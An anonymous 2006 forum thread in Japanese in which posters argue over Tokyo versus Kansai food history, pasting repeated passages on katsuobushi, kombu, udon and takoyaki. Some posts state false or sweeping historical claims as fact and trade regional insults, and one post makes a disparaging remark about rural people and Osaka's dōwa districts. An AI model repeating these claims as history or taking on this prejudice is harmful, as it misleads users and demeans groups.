見習った上で、カビ付けの回数を2〜3回以上行い、脂肪や水分を節の中から吸い出す製法
をあみだしました。「伊豆節」の誕生です。その後、土佐節とならび、伊豆節は全国的に高い
評価を受けることとなりました。

「焼津節」は、直接与市から技法を授かっていませんが、その起源は伊豆の改良節ですので
、与市によって伝えられたといえます。 その後、改良節は全国に広められていくことになりま
す。 後年、与市は望郷の念禁じがたく、故郷の紀州印南に立ち返りましたが、秘法を他国へ
漏らした罪により、追い返されてしまいます。房州千倉に引き返し、親交のあった渡辺家に身
を寄せました。文化12年3月23日、ちょっとした風邪が原因で、58才で他界しました。

5.本枯節
江戸時代に由緒ある製品として知られたのは、熊野節・土佐節・薩摩節です。明治時代に入
ると伊豆節が目覚しい発展を遂げ、土佐節・薩摩節・伊豆節が三大名産品と称されるように
なりました。

明治30年頃、土佐節と伊豆節の長所を取り入れ、徹底した焙乾・3〜6回のカビ付けを行った
「本枯節」である焼津節が登場し、以後鰹節業界の本流となり、現在に至っています。

つまり現代のかつお節ができたのは、江戸時代初期〜後期にかけてという事になり、それ以
前のかつお節は、干物(完全に干からびた)の煮出し汁でカビ付けなどされていない物
関西地域では、多少生に近いかつお節を「花かつお」にする習慣が江戸時代後期にされたと
言われている。
それまでは、全国的にかつお節は佃煮のような食品である。


201 :もぐもぐ名無しさん:2006/12/25(月) 03:14:31
同じ関東の千葉人にも同情されるコピペ東京人
カワイソス

202 :もぐもぐ名無しさん:2006/12/25(月) 03:15:04
>江戸時代に由緒ある製品として知られたのは、熊野節・土佐節・薩摩節です

あれ?江戸はぁ?wwwwwwwwwwwwwww

203 :もぐもぐ名無しさん:2006/12/25(月) 03:15:11
>>199
あくまで自己解釈なので、疑問に思われるのでしたら、やはり一度直接お聞きした方がよろしいかと思います。

204 :もぐもぐ名無しさん:2006/12/25(月) 03:15:14
1.鰹節以前
大和朝廷草創(4〜5世紀)以前に、古代人は「干しカツオ」と「堅魚煎汁<カツオノイロリ>」を
創案しています。 干しカツオは、カツオを素干にしたもの(堅魚)と、煮てから干したもの(煮
堅魚)です。煎汁は、煮堅魚の煮汁を煮詰めて作ったもので、調味料として使われてきまし
た。

日本列島沿岸で豊富に漁獲されるカツオは、タンパク源として重要な位置にあり、大和朝廷
は国々にカツオ浦を定めて、干しカツオと煎汁の献納を強制しました。特に煎汁は、大陸伝
来の調味料(未醤<ミソ>・醤<ヒシオ>・酢等の発酵性調味料)と肩を並べる純国産調味
料として、飛鳥・奈良・平安時代を経て、鎌倉・室町時代まで重用されました。

その後、室町時代になって農業の進歩により、大豆の生産が増加すると、大豆性調味料の
使用量が増え、その分煎汁の使用量が減り、消滅していきました。しかし、カツオの調味料の
味は、人々の脳裏から消え去らず、干しカツオから焙乾法の出現により生まれた鰹節に引き
継がれることになり、日本人の調味料として不動の地位を確立していきます。



205 :もぐもぐ名無しさん:2006/12/25(月) 03:15:45
5枚切りを見たことない?マジ?
いつも第一パンの5枚切り買ってるけど、東京の会社なのになぁ。
関東と関西で厚さを変えて出荷してるってことか。

206 :もぐもぐ名無しさん:2006/12/25(月) 03:16:39
>日本列島沿岸で豊富に漁獲されるカツオは、タンパク源として重要な位置にあり、大和朝廷
は国々にカツオ浦を定めて、干しカツオと煎汁の献納を強制しました

これで十分(笑
大和朝廷素晴らしいな

207 :もぐもぐ名無しさん:2006/12/25(月) 03:17:37
2.鰹節の誕生
室町時代に入り、干しカツオに「焙乾」という技術が導入され、「鰹節」ができました。江戸時代
に入る前から焙乾小屋は、五島・平戸・紀伊・志摩・土佐各国のカツオ浦に建てられました。
当初の焙乾設備は台所兼用のもので、囲炉裏の上にしつらえた平籠に卸したカツオを入れ
ておくと、煮炊きをする熱と煙により自然と焙乾されるものでした。 江戸時代初頭には、北九
州方面で作られた鰹節は、ポルトガル船・イギリス船などにより、平戸から琉球を経て、明国
・シャム国などに輸出されました。

その後、鰹節が広く世間で名声を得たのは、紀州で焙乾小屋が改良され、鰹節が進歩を始
めてからです。堺港の大商人や、京の都の上流家庭で、煮物・汁物料理が盛んになり、従来
の調味料だけでは物足りなくなり、旨味を付加するために鰹節がだしとして用いられるように
なりました。

江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
のはないほど必需品として取り上げられています。鰹節の力により、日本料理が形成された
といっても過言ではありません。

紀州のかつお節のルーツは佃煮

かつお出汁ができたのは江戸時代である
それまでは、かつお節はお湯でもどしてそのまま食べる魚料理

さば節もほぼ同じルーツ。

特にかつお出汁を取り上げた理由は、大阪うどん「きつねうどん発祥の地」のつゆがかつお
出汁と昆布と言う単純な事から書くことにした。
現代のかつお節が完成したのは明治30年
しかし、花かつおなどやあら節ができあがっただろうと言われているのが江戸時代前半なの
で非常に古い文化と思っているほうが間違え。



208 :もぐもぐ名無しさん:2006/12/25(月) 03:19:07
>>205
多分そうでは無いかと…。たまたま私が行くスーパー等に、置いていないだけかも知れないんですが(;^_^A


今ふと思ったんですが、東京名物って何かありましたっけ?

209 :もぐもぐ名無しさん:2006/12/25(月) 03:19:50
江戸食文化紀行
http://www.kabuki-za.com/syoku/bkindex.html

ありすぎ

210 :もぐもぐ名無しさん:2006/12/25(月) 03:20:50
>>208
ドジョウ鍋

211 :もぐもぐ名無しさん:2006/12/25(月) 03:22:06
>>209
確かに有るんですね、東京名物って初めて知りました。

212 :もぐもぐ名無しさん:2006/12/25(月) 03:22:40
つまり鰹節に関しては、
1・鰹節以前:大和朝廷が日本全国にカツオを強制的に献納させた ←関西GJ
2・鰹節誕生:五島・平戸・紀伊・志摩・土佐各国のカツオ浦      ←関西・九州GJ
3・ひろまり:堺港の大商人や、京の都の上流家庭で、煮物・汁物料理が盛んになり、従来
 の調味料だけでは物足りなくなり、旨味を付加するために鰹節がだしとして用いられるよう になりました。 ←京都大阪GJ

あれ?江戸はぁ?(´ノω;`) 




213 :もぐもぐ名無しさん:2006/12/25(月) 03:23:22
>>210
どじょう……


214 :もぐもぐ名無しさん:2006/12/25(月) 03:23:47
京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

 江戸時代前半に現代のかつお節に類似した商品ができあがってから料理の献立の文献が
非常に多く書かれていることから、江戸時代より前の食文化はほぼ無いに等しい。(現代の
料理店で食べられている食事の事)

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました

熊野節があら節や花かつおになったので、それより昔には懐石料理の原型は無いに等しい

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

 滑稽な事に、大阪人の誇りである。「食文化」が捏造だとわかった。
 昆布出汁だけで作ると言い張る大阪人。
 精進料理でもせいぜい作って伝統の食文化とでも言ってみなさい。(笑)
 精進料理はほぼバチモン料理で、オリジナルの精進料理が非常に少ない。

 どれだけかつお節の世話になっているのか考えた事はあるのだろうか?


215 :もぐもぐ名無しさん:2006/12/25(月) 03:24:32
一品モノばかりだねぇ、江戸
料理の土台の話になると関西になるもんねぇ(笑

216 :もぐもぐ名無しさん:2006/12/25(月) 03:24:43
>>213
東京名物
でぐぐると出てくるよ

217 :もぐもぐ名無しさん:2006/12/25(月) 03:26:03
http://www.kyoto-np.co.jp/kp/special/shiokaze/shiokaze_index.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita01.html
近江商人が開拓した北海交易に雇われた北陸の船乗りが力をつけて独立、北前船交易が隆盛をきわめ、西回りで大阪まで昆布が持ち込まれるのは、江戸時代になってからだ。
この頃、白口浜の昆布が京、大阪へ届く。透明な出汁で京料理に欠かせない利尻昆布はさらに遅れる。

http://www.kyoto-np.co.jp/kp/special/shiokaze/kita02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita03.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita04.html
かつお節
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare01.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare03.html

京料理で重要なかつお節が出来上がったのは明治30年


218 :もぐもぐ名無しさん:2006/12/25(月) 03:26:54
そもそも江戸ってほとんど長屋住みだったんだけど、
うなぎや天麩羅普通に食えてたと思ってんのぉ?
士農工商で一番生活苦しいはずなんだが(´ノω;`) 

219 :もぐもぐ名無しさん:2006/12/25(月) 03:28:21
http://www.athome.co.jp/academy/culture/cul17.html

現代の食事とほぼ同じ水準

220 :もぐもぐ名無しさん:2006/12/25(月) 03:28:49
>この頃、白口浜の昆布が京、大阪へ届く。
ご苦労。で、京・大阪が料理に使うわけだ。で、全国に広まる、と。
あれ?江戸はぁ・・・・

221 :もぐもぐ名無しさん:2006/12/25(月) 03:30:14
>>219
なるほど、現在の東京人の食事は江戸期とかわってないんだな(爆笑
おれ、江戸期の関西人よりよほど良いもの食ってるよ
食べたい時に寿司焼肉食ってるし
なんか、東京カワイソス

222 :もぐもぐ名無しさん:2006/12/25(月) 03:30:38
http://www.athome.co.jp/academy/culture/cul17.html

江戸料理が日本料理の基礎

223 :もぐもぐ名無しさん:2006/12/25(月) 03:31:16
>>216
なんか沢山出てきましたが、今一ピンと来ませんでした(´・ω・`)

あと何故長屋だと天麩羅が食べられないのですか?

224 :もぐもぐ名無しさん:2006/12/25(月) 03:31:24
大阪人:ワシらは地元の料理を大切にしてる
東京人:そうですか、それなら吉兆の事も良くご存知でしょうね
大阪人:素材の味がして薄口や
東京人:それじゃ意味がわかりません
大阪人:大阪は焼肉がうまいで
東京人:焼肉は韓国料理ですよ。地元の食べ物じゃないですよね
大阪人:頭狂人はフランス料理を自慢するやないか
東京人:フランス料理を真っ向から否定し続けて韓国料理は否定しないんですか?
大阪人:、、、、、、、、、
大阪人:カッペ、カッペ
東京人:まともな会話になりません



225 :もぐもぐ名無しさん:2006/12/25(月) 03:32:09
江戸料理が「素食」の基礎だろうよ
よく内容読めよ・・・・

226 :もぐもぐ名無しさん:2006/12/25(月) 03:34:16
そんなことかいてありません>>225

227 :もぐもぐ名無しさん:2006/12/25(月) 03:40:13
>>225
↑こんな書き方してるオッサンが2ch張り付いて何してんの?
内容よく読め
本のサブタイトルだけで判断すんな、オッサン

ほら、オッサンの昨日の様子だ↓

http://image.blog.livedoor.jp/news4vip2/imgs/0/5/059b3a01.jpg

228 :もぐもぐ名無しさん:2006/12/25(月) 03:43:47
江戸の住民ってのは約半分が武士、つまり全国の各藩の江戸詰めだよね。
残り半分の町民は
1武蔵国の各地から集まってきた百姓の三男、次男坊
2当時極貧だった東北農家の三男、次男坊
3そのほかの周辺からの流入
4各藩が引きつれてきた御用商人
5よそで何かやらかした無宿者。

粗食は武士文化の影響。おそらく鎌倉武士の流れ。
だが江戸食文化をつくったのは4じゃないかな。

229 :もぐもぐ名無しさん:2006/12/25(月) 03:58:28
>>228
素晴らしいね

230 :もぐもぐ名無しさん:2006/12/25(月) 06:34:46
関西のうどんは90gか95gの小麦粉に対して5gから10g入れるから
つゆが薄くても結果的に関東と全く同じになる。
http://allabout.co.jp/gourmet/udon/closeup/CU20020902matu/
なぜかつゆが黒い大阪きつねうどん発祥の店
http://www.iokikai.or.jp/r.teutiudon.htm
関西のうどんは塩辛い
2麺の作り方
 @食塩水濃度と量(これが大切。必ず計量して下さい。)
季節 中力粉g 食塩濃度% 食塩水g
冬  100      6     46〜50
春秋 100      8     44〜48
夏   100     10    42〜46

塩辛い関西のうどんのポイント

@関西には手打ちうどんがほとんどなく、あるとすれば讃岐になる
A大阪うどんで有名な店をさがすと讃岐に行き着く
Bつゆ以外の特徴が無い
Cつゆも何故か江戸後期に使われ始めたかつお出汁がベースで江戸の文化に強い影響を受けている(きつねうどん)
Dかつお節は江戸時代前期までは全国的に食用で、特に関西地域には出汁を取る習慣が無い。
E関西のかつお節はあら節が支流で、花鰹などの習慣が無かった
F江戸時代には土佐からかつお節を仕入れていたのが関東地方に限られていた


231 :もぐもぐ名無しさん:2006/12/25(月) 06:35:57
http://www.ninben.co.jp/004katuo/10rekishi/index.html
4.土佐余市

江戸の後期に、紀州印南浦の住人で、土佐与市という鰹節職人が、安房(1781)・伊豆(1801
)の両国に改良土佐節を紹介しました。これを熱心に取り入れた伊豆では、土佐節の製法を
見習った上で、カビ付けの回数を2〜3回以上行い、脂肪や水分を節の中から吸い出す製法
をあみだしました。「伊豆節」の誕生です。その後、土佐節とならび、伊豆節は全国的に高い
評価を受けることとなりました。

「焼津節」は、直接与市から技法を授かっていませんが、その起源は伊豆の改良節ですので
、与市によって伝えられたといえます。 その後、改良節は全国に広められていくことになりま
す。 後年、与市は望郷の念禁じがたく、故郷の紀州印南に立ち返りましたが、秘法を他国へ
漏らした罪により、追い返されてしまいます。房州千倉に引き返し、親交のあった渡辺家に身
を寄せました。文化12年3月23日、ちょっとした風邪が原因で、58才で他界しました。

5.本枯節
江戸時代に由緒ある製品として知られたのは、熊野節・土佐節・薩摩節です。明治時代に入
ると伊豆節が目覚しい発展を遂げ、土佐節・薩摩節・伊豆節が三大名産品と称されるように
なりました。

明治30年頃、土佐節と伊豆節の長所を取り入れ、徹底した焙乾・3〜6回のカビ付けを行った
「本枯節」である焼津節が登場し、以後鰹節業界の本流となり、現在に至っています。

つまり現代のかつお節ができたのは、江戸時代初期〜後期にかけてという事になり、それ以
前のかつお節は、干物(完全に干からびた)の煮出し汁でカビ付けなどされていない物
関西地域では、多少生に近いかつお節を「花かつお」にする習慣が江戸時代後期にされたと
言われている。
それまでは、全国的にかつお節は佃煮のような食品である。


232 :もぐもぐ名無しさん:2006/12/25(月) 06:36:58
1.鰹節以前
大和朝廷草創(4〜5世紀)以前に、古代人は「干しカツオ」と「堅魚煎汁<カツオノイロリ>」を
創案しています。 干しカツオは、カツオを素干にしたもの(堅魚)と、煮てから干したもの(煮
堅魚)です。煎汁は、煮堅魚の煮汁を煮詰めて作ったもので、調味料として使われてきまし
た。

日本列島沿岸で豊富に漁獲されるカツオは、タンパク源として重要な位置にあり、大和朝廷
は国々にカツオ浦を定めて、干しカツオと煎汁の献納を強制しました。特に煎汁は、大陸伝
来の調味料(未醤<ミソ>・醤<ヒシオ>・酢等の発酵性調味料)と肩を並べる純国産調味
料として、飛鳥・奈良・平安時代を経て、鎌倉・室町時代まで重用されました。

その後、室町時代になって農業の進歩により、大豆の生産が増加すると、大豆性調味料の
使用量が増え、その分煎汁の使用量が減り、消滅していきました。しかし、カツオの調味料の
味は、人々の脳裏から消え去らず、干しカツオから焙乾法の出現により生まれた鰹節に引き
継がれることになり、日本人の調味料として不動の地位を確立していきます。


233 :もぐもぐ名無しさん:2006/12/25(月) 06:38:04
2.鰹節の誕生
室町時代に入り、干しカツオに「焙乾」という技術が導入され、「鰹節」ができました。江戸時代
に入る前から焙乾小屋は、五島・平戸・紀伊・志摩・土佐各国のカツオ浦に建てられました。
当初の焙乾設備は台所兼用のもので、囲炉裏の上にしつらえた平籠に卸したカツオを入れ
ておくと、煮炊きをする熱と煙により自然と焙乾されるものでした。 江戸時代初頭には、北九
州方面で作られた鰹節は、ポルトガル船・イギリス船などにより、平戸から琉球を経て、明国
・シャム国などに輸出されました。

その後、鰹節が広く世間で名声を得たのは、紀州で焙乾小屋が改良され、鰹節が進歩を始
めてからです。堺港の大商人や、京の都の上流家庭で、煮物・汁物料理が盛んになり、従来
の調味料だけでは物足りなくなり、旨味を付加するために鰹節がだしとして用いられるように
なりました。

江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
のはないほど必需品として取り上げられています。鰹節の力により、日本料理が形成された
といっても過言ではありません。

紀州のかつお節のルーツは佃煮

かつお出汁ができたのは江戸時代である
それまでは、かつお節はお湯でもどしてそのまま食べる魚料理

さば節もほぼ同じルーツ。

特にかつお出汁を取り上げた理由は、大阪うどん「きつねうどん発祥の地」のつゆがかつお
出汁と昆布と言う単純な事から書くことにした。
現代のかつお節が完成したのは明治30年
しかし、花かつおなどやあら節ができあがっただろうと言われているのが江戸時代前半なの
で非常に古い文化と思っているほうが間違え。


234 :もぐもぐ名無しさん:2006/12/25(月) 06:39:37
 京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

 江戸時代前半に現代のかつお節に類似した商品ができあがってから料理の献立の文献が
非常に多く書かれていることから、江戸時代より前の食文化はほぼ無いに等しい。(現代の
料理店で食べられている食事の事)

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました

熊野節があら節や花かつおになったので、それより昔には懐石料理の原型は無いに等しい

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

 滑稽な事に、大阪人の誇りである。「食文化」が捏造だとわかった。
 昆布出汁だけで作ると言い張る大阪人。
 精進料理でもせいぜい作って伝統の食文化とでも言ってみなさい。(笑)
 精進料理はほぼバチモン料理で、オリジナルの精進料理が非常に少ない。

 どれだけかつお節の世話になっているのか考えた事はあるのだろうか?

235 :もぐもぐ名無しさん:2006/12/25(月) 06:41:19
http://www.ogurayayamamoto.co.jp/study/his.html

太平な世が続き、生活も贅沢になり、江戸文化の特質である「粋」と「通」が料理にも及び始
めました。
昆布はその代表的な茶会における「懐石」にも登場しており、宴席に欠かせないものであった
ようです。
江戸の食べ物商は6160余軒にものぼり、「こぶやあげこぶ」と声をかけて揚げ昆布を売る物
売りも市中を流して歩きました。
また、西回り航路の開発によって昆布は「天下の台所」大坂に送られるようになり、元禄の頃
には、とろろ昆布など加工昆布が盛んに製造され、それらを商う「あきんど」が活躍するように
なりました。
加工法の発達により、昆布は広く人々に愛され、その日常に浸透していきました。

大阪人の「昆布」の話も実は捏造であって、実際に庶民が昆布を食べるようになったのも江
戸時代頃からとされている。これは北海道から運ぶと言う点だけでも分かるとおり、非常に難
解な航海を昔から容易にできていたとは考えにくい事からも想像がつく。(上に記されている
とおり陸路では運ばれていない。)

江戸時代より前の文章にも書かれているとおり、昆布は出汁ではなく、食べ物であってアワ
ビと同等に珍重されていた。

大昔から昆布が食べられていたのは正しいが、現代と同じ食べ方になったのは江戸時代に
入ってからの事でこの事も大阪人によって捏造されている。



236 :もぐもぐ名無しさん:2006/12/25(月) 06:41:54
http://www.nisshin.com/life/komugiko_club/map/kinki.html
たこ焼きの話

写真提供:大阪観光コンベンション協会
気軽に食べられる庶民の味方。おやつによし、ビールのお供にまたよしの“コナモン”の王道
と言えば、やはり「たこ焼き」。このたこ焼きが大阪に登場したのは意外に新しく、明治時代に
東京で生まれた「もんじゃ焼き」の、水分を少なくした「どんどん焼き」が関西に入ってきたの
が、そのルーツと言われています。やがて大正以降、まるいくぼみのある鉄板で一口サイズ
に焼き上げられた「ちょぼ焼き」や、その後には「ラジオ焼き」と呼ばれるおやつが大阪で生ま
れました。「ラジオ」の名が冠されたのは、ラジオが当時の最先端だったこととか、ラジオのツ
マミに似ていたからなどという説があります。いずれにせよ、この時点ではまだ中にタコは入
っておらず、具はこんにゃくやスジ肉だったそう。タコが入れられるようになったのは、昭和10
年頃、明石焼きにヒントを得てからのことと言います。
タコに天かす、紅ショウガ。大阪風のだしをしっかり効かせた生地を手際よく、表面カリカリ、
中身はとろ〜り焼き上げる。甘いソースをべったりぬって、あとは青のり、鰹節。食い倒れの
街、大阪だからこそ生まれた庶民の味には、小さな感動さえわきおこってきます。大阪では
半数以上の家庭にたこ焼き器があるそうですが、最近はどこでもたこ焼き用の鉄板が手に
入りやすくなったようなので、ぜひご家庭で試してみてはいかがでしょうか。なかなか奥の深
いたこ焼きの世界に、きっとあなたもハマるかも?

>このたこ焼きが大阪に登場したのは意外に新しく、明治時代に東京で生まれた「もんじゃ焼き」の、水分>を少なくした「どんどん焼き」が関西に入ってきたのが、そのルーツと言われています。



237 :もぐもぐ名無しさん:2006/12/25(月) 06:43:39
きつねうどんの話

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。しょう油とみりんで煮含めて、ふっくらやわらかく仕上げた大きな油揚
げがうどんにのっかります。讃岐うどんなどに比べるとやわらかめの麺、甘辛い油揚げ、そし
て関西ならではのつゆが絶妙な取り合わせ。特に、鰹節や鯖節、昆布などのだしが利いたつ
ゆは、最後まで飲み干したくなる味です。うまい、安い、早い──その合理的なところがいか
にも大阪らしく、大阪を訪れたらとりあえず一杯、という方も少なくないでしょう。
ところで大阪で「きつね」と言えば、それは「きつねうどん」のこと。関東で言う「きつねそば」(
油揚げ入りのそば)は、大阪では「たぬき」と呼ぶことが多いようです。揚げ玉(天かす)が入
る関東の「たぬきうどん」は、大阪では「ハイカラうどん」と言うことがありますが、そもそも天
かすは無料サービスのお店が多いので、「すうどん(かけうどん)」ということで事足ります。
一方、京都で「たぬき」と言うと、刻んだ油揚げ入りのあんかけうどんを指すことが多く、刻ん
だ油揚げが入ったうどんは、大阪では「きざみうどん」‥‥なかなかややこしい話です。

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。

これが伝統的な食べ物なんでしょうか???たかだか明治時代に作られただけなのに


238 :もぐもぐ名無しさん:2006/12/25(月) 06:45:17
明石焼きはたこ焼きのルーツではない

たこ焼きのようで、たこ焼きにあらず。「たこ焼き」と「明石焼き」が大きく異なるのは、地元で
は「玉子焼き」と言われていることからもわかるとおり、ゆるめの生地には卵がふんだんに入
ること。それと、ソースではなく、カツオや昆布のだし汁につけて食べること。この違いだけで
も、明石焼きには、たこ焼きとはまるで異なる味わいがあるものです。
丸く焼いても皿にとると平べったくなってしまうほど、明石焼きはふわふわとやわらかく、箸で
つまむのも難しいくらいですが、その秘密は卵だけでなく、小麦粉のほかに混ぜられる「じん
粉(こ)」にあります。じん粉は、小麦粉からグルテンを分離させた「でんぷん」のことで、ふつ
うは「浮き粉」と呼ばれます。ふわふわの明石焼きには、このじん粉が欠かせません。また、
たこ焼きは通常、鉄板で焼かれるのに対し、明石焼きは薄い銅製の専用型で焼くお店がほと
んどです。
明石焼きの起源についてですが、今からおよそ160年前の天保年間、明石に「明石珠(玉)」
という工芸品がありました。これは卵白を使用した珊瑚の代用品で、かんざしなどに使われ
ました。卵の白身を使うので、黄身のほうが余ってしまいます。そこで卵黄と、明石でよく採れ
たタコを使って「玉子焼き」が生まれたという説があります。明石焼きが大阪のたこ焼きの元
になったというのは、「たこ焼き」の項で触れたとおりです。



239 :もぐもぐ名無しさん:2006/12/25(月) 06:47:39
http://hb2.seikyou.ne.jp/home/my-morita/ni/how_to/ni_chronology2.htm
今川焼き、たい焼きも東京が発祥

http://www.meikatanbou.com/chi_/chi_w/w_s071.htm
///駄菓子/// 

駄菓子とは菓子の中の駄物という意味では、安価で質も高級品ではない干菓子をさしていま
すが、もともとは江戸時代の「雑菓子」からきています。精製された白砂糖が貴重品であった
ために、幕府は庶民の菓子に白砂糖の使用を禁止し、庶民が口にする菓子の甘味料には黒
砂糖が用いられました。これを雑菓子と呼び、大名や武士だけが食する上菓子と区別したの
です。その後、白砂糖の生産力が高まり、明治以降は上菓子と雑菓子の区別はなくなりまし
たが、雑菓子のルーツを受け継ぐ安い菓子の総称として「駄菓子」という名が使われるように
なりました。大正末期から昭和初期にかけては町の駄菓子屋に加えてべっこう飴やゲンコツ
飴、蒸し羊羹などを売り歩く行商人もいました。戦後になって砂糖の配給制が無くなる頃には
駄菓子屋も復興し、チューインガム、チョコレート、ラムネ、コーラといった西洋の菓子も店頭
に並ぶようになりました。
子供用の駄菓子とは違う「郷土駄菓子」という菓子もあります。有名な地域は仙台・会津・飛
騨などが挙げられます。その土地ならではの作物を主原料にシンプルな調味料だけで作ら
れます。有平糖、かりんとう、せんべい、ようかんなど同じ菓子でも地域によって味は変わり
、地方名菓として和菓子屋などで販売されています。


和菓子が江戸で文化が栄えなかったわけは、庶民の白砂糖の使用を幕府が禁止していた
事があげられる。
大名や武士だけが食する上菓子と区別したのです。
東京にある和菓子が駄物(だもの)が多い理由は幕府による規制が強すぎて、和菓子屋が
衰退しまった為です。


240 :もぐもぐ名無しさん:2006/12/25(月) 06:48:23
http://www.arakawa-unet.jp/issue/0604/index.html
もんじゃ焼きは荒川が発祥

大正育ちの叔母の記憶によると、当時から三河島の駄菓子屋ではもんじゃ焼きがあったそう
です。もんじゃ焼きは「駄物(だもの)」といって、駄菓子屋で出す子ども向けのお菓子のひと
つでした。紙が高級品だった時代なので鉄板にメリケン粉を薄く延ばし、子どもたちに字を教
えていたと聞きます。「文字焼き」が、もんじゃ焼きの語源というのも、あながち嘘ではないの
かもしれません。店の隅に練炭やタドンを置き、その上に鉄板を敷いてもんじゃを商っていた
のでしょう。
「あんこ焼き」は和菓子そのもの、出来立てのアツアツが美味しい。
 子どもたちは、もんじゃ焼きの中にあんこ玉を挟んだりソースせんべいに絡ませたりと、駄
菓子屋にある他のお菓子と組み合わせては、おいしく食べる工夫をしたようです。それが、も
んじゃ焼きのバラエティの多さに発展していったのでしょう。
 駄菓子屋(もんじゃが食べられる所)の多さを考えると、戦後は日暮里に駄菓子問屋街もあ
りましたから、もんじゃ焼きの始まりはやはり荒川区か台東区でしょうね。

こんな事が「どら焼き」などのルーツであって、きらびやかで雅な世界とはかけ離れている。
どこでも生まれる文化ではなく、下町の人々の甘いものに対する思いが今の形のたい焼き、
今川焼き、どら焼きといった文化を形成してきたのである。


241 :もぐもぐ名無しさん:2006/12/25(月) 06:49:12
http://homepage3.nifty.com/KOMBU/kombu/kombu_32.html

http://homepage3.nifty.com/KOMBU/kombu/kombu_22.html
http://homepage3.nifty.com/KOMBU/kombu/kombu_23.html
http://homepage3.nifty.com/KOMBU/kombu/kombu_24.html
http://homepage3.nifty.com/KOMBU/kombu/kombu_40.html
手加工職人は腰を降ろし、右足で昆布の一端を踏まえて左手で引っ張ります。

これを鋭利な片刃の包丁で薄く削り剥がします。右足は昆布を押さえるだけでなく、昆布を押さえつつ、さらに右手を押し出すようにして包丁を使います。

簡単なようですが熟練した職人でなければ出来ない技です。

一番表皮を削り剥がしたのが黒おぼろ、次に白おぼろが出来ます。

最後に芯が残りますが、霜地または雪地ともいい、正月飾りやバッテラ寿司に使う白板(しらいた)昆布になります。

右手に持った包丁を昆布にやや斜めに当て、薄く長く削っていきます。

はじめに出来るのが「黒おぼろ」。昆布の表面の黒っぽい部分から削るためです。

そして昆布を削っていくとだんだんと白っぽくなってきます。これを太白地(たいはくじ)と呼び、「太白おぼろ」になります。

太白地になった昆布はすぐには削らず、数日寝かしベタつきをなくし、白く粉が吹いてサラリとなってから削ります。

白い粉は昆布のマンニットと呼ばれる旨み成分です。

こうした技術は大正時代に入って「引き刃」という方法が発明されてからのことです。


242 :もぐもぐ名無しさん:2006/12/25(月) 06:50:47
 江戸時代より前まではかつお節や昆布は佃煮のように食べる食品だった。
 つまり関西地方、特に京都や大阪でかつお節や昆布を出汁にして料理を作っていたと言う歴史的証拠が
全く無い。

 生の魚を刺身で食べたり寿司で食べたりすることも築地市場に冷凍倉庫ができあがった70年前あたりか
らの事で、実際に刺身で食べられるほどの鮮度の保てる冷蔵庫ができたのが40年程度前のこと。

 砂糖は江戸幕府の支配していた食品で、白砂糖は特に武士や一部の僧侶くらいしか食べる事ができな
かった。庶民は非常に高額な黒砂糖しか使えなかったので、砂糖を使う食品文化は、すべて武士や僧侶
以上の地位についていた人々の料理だったと言える。

 江戸幕府が衰退して2回の世界大戦を経験し、裕福な生活を送れるようになった現代では、以上の食材が
容易に手に入る事から、昔の貴族社会や武家社会が非常に贅沢な食べ物を毎日食べていたかのごとく語
られているが、庶民の食文化の歴史は実際には、ここ30年程度の歴史の話であり、それより昔の食生活が
ひどいものだった事は言うまでも無い。

 当然、お金回りの良い土地の方が豊かな生活が送れていた。だから、地方で東京ほどすぐれた食生活が
おくれていた可能性は極めて低い。
 戦時中に疎開を強いられたときに、田舎者が食料を高額で売りつけたと言う話が良く聞かれる。
 田舎者には特有の差別意識が有り、大阪の同和地区に限った話ではない。



243 :もぐもぐ名無しさん:2006/12/25(月) 06:51:40
不味い水で出汁を取る大阪

琵琶湖の汚染はなにが原因か

 琵琶湖をのぞむ比良山系は、関西の登山では一番人気の武奈ガ岳(1214m)などが連らなる。この山地
が降った雨を涵養し琵琶湖へ流す。森は水を浄化し、土砂の流出を防ぎ二酸化炭素を吸収する。京都精華
大学の山田国広氏は『水と暮らしの環境文化』(昭和堂出版)の中で、「下流の都市住民は、上流の森林に
降った水を飲んでいることをほとんど意識していない。上流の森林が健全に育成されているからこそ、下流
は安心して水が飲める」と書いている。本書中では同氏は下流の住民は森林の機能を評価して、例えば水
源税や森林税や環境税というかたちで恩恵の還元をなすことを提唱している。

 水質検査の結果琵琶湖の水がかなり汚染されていることがわかった時、私はいささか落胆した。水道の蛇
口をひねれば水が出る、レバーを押せば尿が視界から消える。日常のあたりまえとなった動作に、「水の流
れ」を考えることもなくなっていたことを恥ずかしいと思った。

